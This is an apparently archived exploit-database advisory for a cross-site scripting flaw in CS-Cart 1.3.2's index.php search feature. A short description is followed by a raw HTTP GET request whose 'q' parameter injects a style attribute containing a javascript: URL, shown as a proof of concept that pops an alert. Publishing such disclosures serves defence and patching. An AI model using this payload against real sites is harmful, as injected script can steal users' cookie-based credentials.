CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting

EDB-ID:

31443


Platform:

PHP

Published:

2008-03-19

source: http://www.securityfocus.com/bid/28333/info

CS-Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

CS-Cart 1.3.2 is vulnerable; other versions may also be affected. 

GET /cscart/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=3&q=%22%20style%3D%22background:url(javascript:alert(12345))%22%20OA%3D%22&.x=0&.y=0 HTTP/1.0
Cookie: cart_languageC=EN; csid=
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 192.168.1.1
Referer: http://192.168.1.1/cscart/